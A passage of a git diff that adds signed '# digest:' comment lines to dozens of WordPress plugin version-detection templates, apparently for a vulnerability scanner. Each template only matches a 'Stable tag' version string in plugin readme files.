4a0a0047304502207b5e286a6e38b888585cd6e81e7fed586e49920e29669426b6ab0ce03212833402210088b403215160884227ba3b44ba0fbf5a6f6f901676b8dd04c51efe658786b234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9dfa..59f3a576a3b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d47172b8cc4d387ab1a4a1a099de6c0ba752c3ebd6c13e69c93642709e3e007022100fc1cd748a79f444eb9b95bcd3209924054ae9ce29362403eb01b7ab02690f6ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d19..100c1f3247a 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c703c344c2d3eda76ccb6505429cc22f40449a02ff425d27811c5fe2a885881402207242b463fed517b029d5d236afb5fc17fa76203ac72bcd9bd5c7cda32fd97e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d46328..30075abc53d 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100979e636eee391f656123f25e53fa9bc5578e0a5eb55c4cfe8a6beff3b0e01606022100835348fe40515702ae039687e9a0ea9b2c5eaf1abe9241e577da6dd7b20e3db3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c7..7fe3621ed50 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e0dc16d09c9bdf86b2435bfb1c3b8f5728519c34160581918a4ee2c14c9c2230220087428f3d23dfd66485a97e007bae4974ec0363d4f7607c8cf92d440e3564a5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee17..df1865d4317 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220060e1e206ac695b643fc3a00062d0c0a4a4effdffd394ccd9287bf3b7ace3a8802206f790eba87577ec056b20150e69b719d5ecb242ede2a6e45bd46960c4e71ca93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e41..6f25144d7ac 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ff8bc475cb96360cd88159552d1a16d5834c478313ea7e4751ba7f716be43044022063c59a58b57746120f1d187b0b0aeb42190b9f19e0132dc2af7fcdd0de3d04f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a1..8bdd9ff5fde 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220548f429aff480125ad59eb4f3a55abd9004e341c4de73610f01610509b54563e0221009abc41400ed025df88753453ef390dbef34ad7661600d1fa2cb99efeb539393b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfcf..653995dd461 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022046ff97a6aea566a22d41fc274c2d6d3b2c1d6eb7d9a8151dd8cc51756a5b100602203e329b1f25a08da5569308e2b3a2437a55058b8c25c31d2081eb0824f7881895:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d31..9b1b531c2ac 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a67999a8f34b89f78dafdea3fd03ee34f112e9d612bab3b65a9c5a7e7a567f060221008da785a09b681da86adc90dc671084fc0f385d7fe7162890ff1f8f11f0ca7285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db688..23568d16ad8 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eef4d5274b6202a91f8a824f97e0aa7b41ccd6cd1fc8e74f9f8f625d9591b8bb0220515fd611c70f9a78488edc3769f2891fb9d6cd68b8e08abd825711b01a5d69f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3dbb..c18b71617d9 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ad807f68c8d344a073a6d796c2b878b7977465bb85ab60a6cdf70cbd64a8d622022100afde7745f538b1f6c86892f71df8b3dd427a5735405021ba72eda4b0a4d8a6e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca381..6c1108caa6e 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d27064c086bb7342a00128ed684fdb4eebd1255c0ba0d8792fa605383c6e62c7022100f4130be066fe86663c4ef094bc3cb9354ce8ce46e99eed63bb536e65fc1f430c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255b..c07ce1aa4fd 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab53ee55334b8a73931890e8b1e5d5b3e7ceb56eba2dde633eff03c4805746a1022100943db8300198dd448fd263f192377281d68ded7c83fb201205d933c90714f46c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d00..8176c98e5f5 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202148eeeb3f04ea678f42a1cb1c404979deab862e3452f558f8a70dac1570648a022100bc996b252f2452ec48adb8912a756bcbced7f3128156bdec2242c1d76b74b620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed51..99783df32eb 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206d653c207d83df862e04228721919f64217590670f7a37398bfb9a4e916954ed022100f11968222cc71f24d4b244b431c3d6810796bc665cd18b14a07122b2727a1b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b1..ba44a795fd1 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3e37fa65b51fd729fc85b414cfa487c9669ec944bfa78099f29fb1511216e63022100f2218bcf39667ea2574304d545f7b98ccbdcfce7077806fa25eb94619b2bae44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3e..ea59b59420c 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d0a923593822ff0d29917daa1cbb8bdf7c41fe47cbeb9d3d73bcbbb8ec47018b022016927fd78933e1768e752b00393f1950b8a0be4cfe1597601779afb6a4e3e6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec50..00ba9936cd8 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5d6c6a7ac63c2cc08ba609f1645d78898eeca5e1f1662009ef026ad04fab922022100c89b5089086e58771f03e7d3d5848a1215bc28e2ae16a2b58a37486687648e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a2203..b2136ff15a4 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000acc83ebfa8bd480806f90d9484826698d249dc982298e1535c7d24f0a84c2f02207693c3f0bccca288ca84c8164e4dac2f77971e71c44a335b5f51ded5e5f9225e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453e..f168b245e16 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008a207cd1b70752b838f3c56979bb0f917751984d4d4ededcc94d5d767643b6d90220072b169383d0d81a129a6c061635df96a0c188b2fa730e899eb4a6bc63d76883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac08..6685b6e2b5e 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf70b05b6f158d4ccfa5e8deb60742e0a1967e26faa00415d48a7dc113360f20022100ed1dc00ddf79e705b38eedc11a0847f40d6bfc427beb928fa2fca8cd3baffafb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca9..06857503881 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6b0e8a23796358a87c53b5eb4c176c37bbf86d96eeee9ecc8c074d3ed27cc6c022100d26ec955a70170f4d3cf34d4625efd8625b5b9cb1524e2e2b3fbfcdd4dccb2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82db..4893861a05e 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ac332c4b17afa222d60f74ef9cad782530929ac09de10e8cb3c3444e6bd01fd10220387908e59ff21d629c5fa15639b32cb3b5037bac32049262f2f034620f5260da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201fc..98d7cf165c8 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e87fdfbe0ce09e286b1e932e267a6adecb171efa1bcb17dc5647261a20660d86022100e0d00f5fa2e52d80f1460b002eca7a139ccad7fd1bfe8547277021f66a139f3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d07..956c0e5b65f 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202df9732f740eae61adefc3c773c6fcb9636034364ab28cfad2ef607e1851591002200f279d5ff7927c73bca2e534460571e897033b9df2d679e3e962c03555e865b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78a..4bba6e3236f 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba8ce48e4dc781ba08946334beed4326ebf19f83b9b02e64c1bec84ca8679da3022100dfb50cc5210c1313f7be1c05ef6097c80f1990c075e59efea8fa9f36d355fb60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8eaf..191db3e7d60 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201de62249a0ee24646ec876a1f84a258120a2a814c937e1a6de12521e6dfd1df302205720a3234711f31b019abc45c0c9d0173cc9748e8a857a94d9b02d8ad609546c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e1..bb6d549a28a 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009391f4c5583b946cd169fb6a3d02238835cd04d3fd8a126a29576e2d59f7ab6a02200ae2dba28c079cefb99a4947e43721154d9c383635d8160ef2542f932b487760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389dc..dba08b2aad8 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210094ed24404a60814e4079abe0b2b0d72d1271b3e59d78aefdd2f82ee529cedf92022100b12ad1391408ddba975704bd5ddf56021f9c7b6e8ad2d155a5bd6ebd09360ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492c..902a6feb34b 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205681d9bc9ffc0d57470edc6ee97e007aeda9149f94ed3ab75cba0e3ec2d3cec9022100f93da2db208bd6f0fbf6331e5df823d746c1b9451d4667a7f74c1e92172d0898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d1..d6110b55d43 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022074a93b4cd30c5c4002706b3198b26882973b91ebe6b95dd91d1dc29a87da38c8022100e59bf1bfdcdb3da575ccced326acc997bc3aacad9141f9e8b4c80defdbf67c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee79807..d0cbb5d8905 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100881b910cf85347244be1150fd232a31fa97d1f2fddc8c321f7f089d973f8ac7f022060a0ed743abaacf5f041a0fb45618b4e3e8d14fdcc843bec34c644911d9299b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767b..e5b105a9b98 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b596a36fd6efb3a4e672ad84559fcfa02850988e269c4fd52a22a69675fffd5022100f8a4df34e4a8651f719d9cebd777d4448e7e52699c85cbb631c17bdb900f7771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073ca..6252d46ddc9 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206739464cb623c68ed0df4589d5fb6e8c8187a30edc196d5c141ce583cc9710f90220594570d6a11a0a2b1f724a1e6979aff64037b87859cd779e2893809994faceb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55f..bbf6910a403 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220790768da970a20f3bd890fd7fbf93cc7c879cdec2c756d5a35e09ee8cc10befe02203ec410b5bd4845fb981a8015149faee3ab99e449a7a2214480b8aff9c7e672d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692e..703b1f53ac7 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220339f893e3efce940a548072d00db202c03fb7693cbed1792d998523d9d26d29d022100d6c6b606fa1ae7fd34985101c5bc5ccc2e804e5cc4337e9df621b3b384bd056f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f3..b4c674a93fa 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c50d8b4a45d0d53b144f8711b255a4c9388ec0a89f6aa8dd4cb04a03663d05d022012a6d49247249ccc01acc7c410f94c6c623b7fb71f5341d22b16063f6b9fb5b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316c..94a31ea600b 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066b4e30f494404096d0e06a809a482c18f2c5b02167cdeddebf20f30e459ec90022047b680f4eb64ea4275e5fefdfa939a00b6748d5516b30f1944dc3ed1e12ed49e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff207791572..cafb7297962 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009151e10d0bea4aa9d96015842d91f721f116775d6cd106d5445ca431ad36e80a022071ef2a83242172beadfa4fddf5d0f4c94d84b1e528f6cf9ecd94d01ab23d98c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017a..a0d592972af 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200d0dc36db6924f9753e3431c04706411a49e371cf494bced6959f09d1cd72a8e02203d583d761010935c92d7f01eae41be6fb3c7ae3b5090126e0098e56b30ca1bb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d5..2ebbd61eee2 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d04ccb99971aa4953f9c33fad148bf56dfcb69a84eb15a5d8ec2413be6e2ef04022100ad0e2ea7af645ce2f85f7d2c69bea3ecfaa7ab76be934bbd7e27362e9949fcae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf56..2f6fe06e088 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c7ec6a6c72e7f9b92ee07627ef5236944f3ad85bb835e2012b5917101f0b6371022100fbb9b00ade408a0e02e1afc172bb10a9ea32d8d821e0ae3862146ddedbf47e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94b..8eebac375e3 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e280f6cc83036eb0aecb41a3af235b4b3e420805c5341e13d1277176e1556a250220532425e58d01382b95f0dcdb7cd62112369ddf23c03511219b0f334166c7f3bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709d..3c606dfc0c9 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca28d01cc6a0c4bdf7cdd88f3c65d1918ee0f16bc4341e1e508869823d41e644022100a5f3b017070bfbfb7e3660eb72c0137b1a9e15cf79adfba7df97240a5b4e9fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c276825..9e8b4e32d73 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100850fbfb7e5415f70da15b02df0366d757edd89f935212f47ea86d2a21a9a4339022100f01e816b9fca0b5b047c31fd6b3a1c27173fa4de510410719fe75e93a6b0aef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b1..de37f472871 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f07e73eb69ce00ee7fee870029500541e07f225af88627b27269c8e31e71b7f302200815bb02877ae77bceb8c9530be35b481718fe497c0bd7fc49b4f0b5de265b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a9..c84a853e500 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 